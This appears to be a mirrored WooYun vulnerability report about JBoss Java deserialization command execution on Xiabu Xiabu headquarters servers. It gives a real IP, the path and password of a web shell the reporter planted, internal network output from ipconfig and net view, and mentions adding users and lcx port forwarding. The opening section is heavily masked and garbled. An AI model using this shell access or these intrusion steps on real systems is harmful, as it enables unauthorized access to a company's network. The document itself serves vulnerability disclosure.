乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开
发现呷哺呷哺总部两处命令执行第一处刚getshell就被管理员发现给服务停止了,悲催。。。。。
*****^^一处刚刚shel*****1.http://**.**.**/RSC/_*****e22416813d597dbafe12.png&qu********************^^化命^********************d0b0b0d9e281924378b9.png&qu********************etsh***************2.http://**.**.**/RSC/qq.jsp 密码:j14n_*************************102584584faa7839eedb.png&qu********************^^**********ws IP Con****************************************. . . . . .********************. . . . . . ********************. . . . . .********************ed. . . . ********************ed. . . . ********************st. . . . . ****************************************apter ****************************************fic DNS Su********************. . . . . : BA********************. . . . . : 00********************. . . . . ********************. . . . . . :********************. . . . . . :********************. . . . . . :********************. . . . . . :********************. . . . . . :********************. . . . . . :******************** 192.168.********************网^********************gt;ne********** ********************-------------------********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** **********^完^********************de&g********************^吧,道德问^********************d3455f2081d5397ead92.png&qu********************^********************67d52eed040797129d38.png&qu********************39ade3b42d861f1196af.png&qu********************cx转发端^******************************这^*****
之前本来发现两处的,结果第一处刚刚shell,就被发现了。http://116.218.128.238:9000/RSC/
jboss java反序列化命令执行
直接getshellhttp://116.218.128.238:9000/RSC/qq.jsp 密码:j14n
内网环境
Windows IP Configuration Host Name . . . . . . . . . . . . : x3850 Primary Dns Suffix . . . . . . . : xiabu.net Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : xiabu.netEthernet adapter x3850: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : BASP Virtual Adapter Physical Address. . . . . . . . . : 00-1A-64-DC-E4-B0 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.1.225 Subnet Mask . . . . . . . . . . . : 255.255.255.0 IP Address. . . . . . . . . . . . : 192.168.1.248 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.202 DNS Servers . . . . . . . . . . . : 192.168.1.220 192.168.1.243
大量内网主机
net view服务器名称 注释-------------------------------------------------------------------------------\\360SD \\ADRMS \\ATTENDANCE \\BIPC01 \\BISRV01 \\BISRV02 \\BISRV03 \\BISRV04 \\BISRV05 \\BISRV06 \\BISRV07 \\BOH-APP \\BOHSRVUP \\CLIENT \\COMETDB \\CRMDB \\DBSRV01 \\DBTEST \\ERP-A \\ERP-GS \\ERPDATABASE \\ERPDATABASE1 \\ERPDISAPP \\ERPENTAPP \\ERPOVRSRV \\ERPWEBAPP ERPWEBAPP \\EXCAS01 \\EXCAS02 \\EXMBX01 \\EXMBX02 \\GSSERVER \\HHT-SRV \\HHT-TEST \\HHTSERVER \\HR-APP \\HR-ATTEND \\HR-DB02 \\IAS \\ICBC \\KMS \\LYNCSTD \\MIDSERVER \\OA-TEST \\OAAPP \\OADATABASE \\PC0176 \\PC0506 \\PC0709 \\PRINTSERVER \\REPORT \\SEP \\SPDB \\U8 \\WEBSERVER \\WXSERVER \\X3550 \\X3650 \\X3850 \\XB-DC01 \\XB-DC02 \\XBREPORT \\YQZL-APP \\YQZL-BC \\YQZL-BCM \\YQZL-CCB \\YQZL-DB YQZLDB \\YQZL-PSBC 命令成功完成。
成本 这应该是商业机密了吧,道德问题,我没看哦。。
用户
可以直接加用户 lcx转发端口 探测内网 就证明这么多吧
java反序列化命令执行
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)